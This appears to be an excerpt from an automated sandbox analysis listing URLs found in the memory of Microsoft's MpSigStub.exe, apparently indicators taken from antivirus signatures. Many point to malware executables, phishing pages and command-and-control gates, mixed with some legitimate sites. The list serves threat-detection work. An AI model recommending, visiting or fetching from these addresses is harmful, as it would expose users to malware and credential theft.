Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://tu5amrmm.systotal.com/vnmsq40nj1q7a.php?30/receivetimeout30/connecttimeout/silent
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://tukangecuprus.com/cr_file_inst.exe
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://tulip45.sepia.adulteroero.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://turbogalaxy.org/ru/?q
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://turtleone.zapto.org/out.rtf
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://twister.agropecuaria.ws/agro/twister.zip
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://twitck.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://twogreekgirls.com/wp-content/wellsfargo-online-update/com.htm)
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/PbrTEg
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/ardgdq)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/sqivdw)
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://ubercancellationfeelawsuit.com/p.png
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://ucil-bd.com/swfobject/alape/index.php)
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: http://uidacrtsppxece.com/ioir.png
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://uiltime.info/?c=v3
Source: MpSigStub.exe, 00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmp	String found in binary or memory: http://ulink7.dudu.com/
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://ulog.cleaner2009pro.com/?action=
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://ultimatepropertiesllc.com/ike.exe
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: http://uncpbisdegree.com/download3.php?q=
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: http://uncpbisdegree.com/download4.php?q=
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://uniblue.com
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://unifscon.com/RemAp.exe
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it/?pid=21&ext=bcool
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.mysafesavings.com
Source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp	String found in binary or memory: http://union.hao3603.com/api/down
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: http://unstat.baidu.com
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://unstiff.pw
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://up.dev-point.com/uploads/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://upd.lop.com/upd/check
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://upd.zone-media.com/upd/check
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://update.7h4uk.com:443/antivirus.php
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://update.qyule.com/setup.exe
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://update.sykehuspartner.no/splunk/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://updates-spreadwork.pw
Source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmp	String found in binary or memory: http://updates.winsoftware.com/
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	String found in binary or memory: http://upgrade.onestepsearch.net
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://upload.exe
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://uploader.sx/uploads/2018/5b9ed5bc.exe
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://uprevoy.com/
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://urels.ml/sokha2.php
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://url.cn/
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://url.fzpmh.com/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://urlz.fr/6zdb
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://ursreklam.com/wp-content/themes/sketch/vall1/agh.doc
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://us.onesoftperday.com
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://usb.mine.nu/p.php
Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	String found in binary or memory: http://usd.881515.net/down/1.exe
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://user.qzone.qq.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://users.cpadown.com/ktv/
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://ushuistov.net/cgi-bin/check/autoaff
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://utclient.utorrent.com/pro/bittorrent/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://utclient.utorrent.com/pro/flow/trial/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://uwibami.com/indexx.php)
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://uxos.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://v.bddp.net
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://v.iask.com/v?tag=&k=%s
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://valentinadaddato.it//wp-includes/pomo/xcl/excelz/index.php
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://vbatools.pl/lista-aplikacji/
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://venus.ge/ds/1.gif
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://vequiato.sites.uol.com.br/
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://verred.net/?1309921
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://verticalagriculture.net/files/csrss.jar
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://vesterm.freehostia.com
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://vidalaviva.com/
Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmp	String found in binary or memory: http://vidareal2010.pisem.su/imglog.exe
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://video-song-player-install-now.com/
Source: MpSigStub.exe, 00000023.00000003.6273836006.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://vidquick.info/cgi/
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://vidscentral.net/inc/6348852
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://vidscentral.net/inc/63488524/media_codecs/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://view.superweb.ws/site/folder.exe
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://vip.escritorioactivo.com/controlContinuidad.htm
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://vip.fanyarightway.com/360/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://vip.zeiwang.cn/images/logo.gif
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://vip9646.com
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://visuawsdyorganizationforyoungbraine19hqs.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://vjdevelopers.com/ad/index.html)
Source: MpSigStub.exe, 00000023.00000003.6273836006.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://vkontakte.ru/login.php?
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://vnmxjcx.com/config.ini
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://vnz2107.ru
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://vod.7ibt.com/index.php?url=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://voesttalpine.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://voguextra.com
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://volcanox.comxa.com/dix/disk
Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp	String found in binary or memory: http://w.nanweng.cn/qy/gl
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://w.robints.us/614.htmlwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://w.robints.us/cnzz.htmlwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://w.robints.us/jf.htmlwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://w.w3c4f.com
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://w.woc4b.com
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://w.x.baidu.com/go/
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://w0rms.com/sayac.js
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://wallwishers.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://warmsnugfat.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://warningjustice.com/z.html#ymxpy2hazwfzdg1hbi5jb20=
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://watchbands365.com/wp-includes/css/pdfview/index.html
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://watchchurchonline.com/flc4/llc/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://weather.265.com/%s
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://weather.265.com/get_weather.php?action=get_city
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://web.nba1001.net:8888/tj/tongji.js
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://web/cdr/DISP/plazma_2/backend/phone.php
Source: MpSigStub.exe, 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp	String found in binary or memory: http://webapp.torntv.com
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://webpatch.ragnarok.co.kr/
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://websearch.gettango.com/?
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: http://webspyshield.com/a/setup.exe
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://webye163.cn/hz
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://weeshoppi.com/wp-includes/id4/m4hg5vm7xsh6utv.exe
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://wermeer.cn/wermeer/report.php?title=
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://westcost0.altervista.org/w/api2.php?a=
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://western.net.pk
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://westernpinesbelize.com/lmb/login%20pdf.html
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://wetnosesandwhiskers.com/driverfix30e45vers.exe
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://wevx.xyz/post.php?uid=
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://wewewewewesesesesasbacwederffggffddsss.duckdns.org/svch/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://wgdteam.jconserv.net
Source: MpSigStub.exe, 00000023.00000003.6285428567.0000028BD7FBD000.00000004.00000001.sdmp	String found in binary or memory: http://whatami.us.to/tc
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://whatismyip.com/automation/n09230945.asp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://whenyouplaygood.com/s/gate.php?a
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://white.shougouji.top
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://whoisthis.100webspace.net/a.php?post=
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://wifc.website/
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://wijmo.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://willy.pro.br/download
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://win-eto.com/hp.htm
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://win32.x10host.com/
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://win7updates.com/
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://winantiviruspro.net/buy.php?affid=
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://winbutler.com/a.php
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://windowstation.bar/opzi0na1la.dll
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://wingsfinger.com?
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://wingsfingers.com?
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://winmediapackage.com/rd/out.php
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://winshow.biz/feat/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://wizzcaster.com/api/v
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://wmr-moneys.org/config/line.gif
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://woah90s.com/hqalzrakueii/nbsa
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://wordfiletransfertocustomer.mangospot.net/-.......................................-...........
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://wordgroup.bounceme.net/9cb6541e5b0d/
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://work-helper.com/files/client/OffersWizard.exex
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://workwear.shoppages.eu/tools/adobe.ph)
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://world4freeblog.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://worldnit.com/ofi.exe
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://worm.ws
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://worm.ws/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://wp.fanchen.cc/paid-invoice/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://wpitcher.com
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://wpr.mko.waw.pl/uploads/scheduler.txt
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://wsdygreenkegheedahatakankeadeshnaa30gas.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://wsfgfdgrtyhgfd.net//adv//
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://wsfgfdgrtyhgfd.net/adv/
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://wsus.chrobinson.com/scriptstothelocalcomputer
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://wtfismyip.com/text)echo
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://wvpt.net/invoice-receipt/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://ww.fbi.gov/worldwidedlogs/addtobase.asp
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://wwsw.friendgreeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://www-afc.chrom3.net/images/
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://www-search.net/?
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://www.%domain%/updates/check.html
Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/MyFriends.jsp
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/mail/MailCompose.jsp
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/mail/MailCompose.jsp?ToMemberId=%s
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/searchbar.html
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.114.
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://www.114Oldest.com/zz/mm.htm
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://www.126.com/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.17173.com/
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	String found in binary or memory: http://www.178gg.com/lianjie/
Source: MpSigStub.exe, 00000023.00000003.6345727026.0000028BD6A3E000.00000004.00000001.sdmp	String found in binary or memory: http://www.180searchassistant.com/
Source: MpSigStub.exe, 00000023.00000003.6345727026.0000028BD6A3E000.00000004.00000001.sdmp	String found in binary or memory: http://www.180searchassistant.com/a
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.1882361.55freehost.com/voicemail.html)
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://www.19620425.com/download_adv/file.exe
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://www.22teens.com/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com/?18181
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.2828hfdy.com/bak.txt
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://www.3000.ws/
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://www.31334.info/1stemail.php
